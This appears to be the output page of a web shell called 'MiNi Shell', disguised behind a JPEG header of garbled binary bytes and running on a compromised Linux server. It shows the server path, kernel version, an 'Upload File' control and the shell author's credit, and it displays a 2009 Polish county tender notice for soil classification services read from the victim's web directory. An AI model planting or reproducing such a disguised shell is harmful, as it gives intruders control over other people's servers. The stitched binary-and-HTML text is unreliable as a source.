JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/114583-N-2009.html

<p class="kh_header"><b>Opoczno: Sukcesywne wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów, zlecanych na bieżąco w formie pisemnej w latach 2009- 2010</b><br>
<b>Numer ogłoszenia: 114583 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczno , ul. Kwiatowa 1a, 26-300 Opoczno, woj. łódzkie, tel. 044 7361500, faks 044 7361500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opocznopowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów, zlecanych na bieżąco w formie pisemnej w latach 2009- 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> usług o wartości poniżej 206 000  euro.
1.  Przedmiotem zamówienia jest sukcesywne wykonywanie prac z zakresu gleboznawczej klasyfikacji gruntów na potrzeby  Wydziału Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami, Starostwa Powiatowego w Opocznie, polegające na bieżącym wykonywaniu robót zlecanych  w  formie  pisemnej  przez  w/w  Wydział.
	Zamawiający przewiduje, że do końca 2009 roku zleci do wykonania  ok. 30 opracowań, a w 2010 r. ok. 40 opracowań. Ilość prac do wykonania uzależniona jest od ilości napływających wniosków,              w  związku  z  tym  może  ulec  zmianie. Zlecenie obejmuje od jednej do kilkudziesięciu działek do opracowania, na obszarze jednego obrębu ewidencyjnego.
	Wszystkie prace muszą uwzględniać  dane wykazane w operacie  ewidencji gruntów i budynków. W przypadku nieścisłości pomiędzy danymi w części opisowej 
i graficznej, Wykonawca bada dokumenty źródłowe i eliminuje zaistniały  błąd .
	Prace obejmują geodezyjny pomiar zasięgów  użytków gruntowych i konturów klasyfikacyjnych. Zmianami należy uaktualnić mapy ewidencji gruntów. Przebieg wykonanych prac oraz wyniki analiz należy szczegółowo opisać w sprawozdaniu technicznym.
	Termin realizacji prac - 2 miesiące od daty otrzymania przez Wykonawcę zlecenia od Zamawiającego, do daty wpływu operatu technicznego i dokumentacji służącej do wydania decyzji klasyfikacyjnej do Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej wraz  z  protokołem odbioru. W przypadku istnienia mapy numerycznej dla danego obrębu ewidencyjnego, Wykonawca   zgłasza   się   do Ośrodka   celem     rozliczenia     użytków     i     klas 
w działkach. Inny tryb Wykonawca uzgadnia z Ośrodkiem.
	Proponowana zawartość operatu technicznego przekazywanego do PODGiK:
- kserokopia zlecenia otrzymanego od Zmawiającego
- wypisy z rejestru gruntów
- notatka służbowa w sprawie przeklasyfikowania gruntów
- protokół proponowanych zmian klasyfikacji gruntów
- opisy glebowe
- szkice polowe
- rozliczenie konturów klas i użytków w działkach
- obliczenia
- mapa zmian
- mapa klasyfikacyjna uzupełniająca oraz wykaz zmian gruntowych
- protokół sprawdzenia klasyfikacji uzupełniającej podpisany przez inspektora kontroli ds. gleboznawczej klasyfikacji gruntów upoważnionego przez Wojewodę Łódzkiego
- płyta CD z wyjściową oraz nowo obliczoną bazą
	  Zawartość dokumentacji służącej do wydania decyzji klasyfikacyjnej ( dla Zespołu do spraw Ewidencji Gruntów i Budynków ):
- kserokopia dotychczasowego wypisu  wypisów  z rejestru gruntów
- mapa zmian
- notatka służbowa w sprawie przeklasyfikowania gruntów
- protokół proponowanych zmian w klasyfikacji
- warunkowo protokół udatności zalesienia
- mapa uzupełniająca po zmianach oraz wykaz zmian gruntowych
      Do każdego operatu technicznego powinny być dołączone 4 egzemplarze map ewidencyjnych uzupełniających i wykazów zmian gruntowych ( 1 komplet wpięty, 3 komplety luzem )
Zamawiający w zleceniu określi  ilość  działek podlegających opracowaniu  w danym obrębie ewidencyjnym. Wykonawca wystawi fakturę,  na  kwotę  zgodną  z  umową, na podstawie ilości działek uwidocznionej w wykazie zmian gruntowych  lub w przypadku jego braku na podstawie ilości działek podlegających opracowaniu kontroli terenowej.
	Obowiązujące przepisy i instrukcje:
- ustawa z dnia 17 maja 1989r. Prawo Geodezyjne i Kartograficzne
- rozporządzenie Rady Ministrów z 4 czerwca 1956 r. w sprawie klasyfikacji gruntów 
- rozporządzenie Ministra Rozwoju Regionalnego i Budownictwa  z dnia  29   marca  2001r.  w  sprawie  ewidencji  gruntów  i  budynków
- instrukcja G-5
- instrukcja K-1 (1995r.)
- instrukcja G-4
	2.  Zamawiający nie dopuszcza składania ofert częściowych.
	
3.  Wykonawca nie może powierzyć wykonanie zamówienia podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1  ustawy Prawo zamówień publicznych. 
2.	Warunki szczegółowe udziału w postępowaniu, określone w oparciu o art. 22 ust. 1 ustawy Pzp
2.1	Potencjał kadrowy 
Wykonawca musi mieć do dyspozycji osoby posiadające uprawnienia:
a)  do wykonywania samodzielnie prac klasyfikacyjnych na terenie woj. łódzkiego wydanego rzez Wojewodę Łódzkiego.
b) do wykonywania czynności kontrolnych w dziedzinie gleboznawczej klasyfikacji gruntów wydanego przez Wojewodę Łódzkiego.
c) w dziedzinie geodezji i kartografii z zakresu 1 i 2 lub 1 lub 2.  
2.2	Potencjał kadrowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek określony w pkt. 2.1 lit. a,b,c
3. Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.
4. Przepisy ustawy Prawo zamówień publicznych o wykluczeniu Wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ustawy, stosuje się odpowiednio.
5. Zgodnie z art. 23 ustawy Prawo zamówień publicznych Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
5.1 W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia każdy z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy oraz  musi spełniać warunki udziału, o których mowa w art. 22 ust. 1 pkt. 1 ustawy, a także muszą spełniać łącznie warunki, o których mowa w art. 22 ust. 1 pkt. 2-3 ustawy.
5.2	Wykonawcy wspólnie ubiegający się o udzielenia zamówienia ponoszą solidarną odpowiedzialność  za wykonanie umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełniania warunków określonych w rozdziale V specyfikacji  Wykonawca zobowiązany jest złożyć wraz z ofertą nw. oświadczenie i dokumenty:
1.1.	Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Prawo zamówień publicznych, wg załącznika nr 2 do SIWZ.
1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3 Wykaz osób, którymi dysponuje Wykonawca lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, zgodnie z wymaganiami Rozdziału V pkt. 2.1. SIWZ - wg załącznika nr 3 do SIWZ 
Do wykazu należy dołączyć:
-  kopię  upoważnienia do wykonywania samodzielnie prac klasyfikacyjnych na terenie woj. łódzkiego wydanego przez Wojewodę Łódzkiego.
-  kopię upoważnienia do wykonywania czynności kontrolnych w dziedzinie gleboznawczej klasyfikacji gruntów wydanego przez Wojewodę Łódzkiego.
-  kopię uprawnień zawodowych w dziedzinie geodezji i kartografii z zakresu 1 i 2, lub 1 lub 2.
2.	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, każdy z tych Wykonawców jest zobowiązany złożyć dokumenty wymienione w pkt.1.1, 1.2, niniejszego rozdziału.
3. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
3.1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 1.2. powyżej składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie
3.2. Dokument, o których mowa  w punkcie 3.1. w podpunktach a) i b), powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
3.3.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o których punkcie 3.1., zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis punktu 3.2. stosuje się odpowiednio.
4. Wymagane dokumenty mogą mieć formę oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (na każdej stronie dokumentu kilkustronicowego). 
4.1. Zamawiający będzie żądał przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu będzie nieczytelna lub będzie budziła wątpliwości co do jej prawdziwości.
4.2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.opocznopowiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Opocznie ul. Kwiatowa 1a, 26 - 300 Opoczno.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Opocznie ul. Kwiatowa 1a, 26 - 300 Opoczno - biuro podawcze lub za pośrednictwem poczty.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com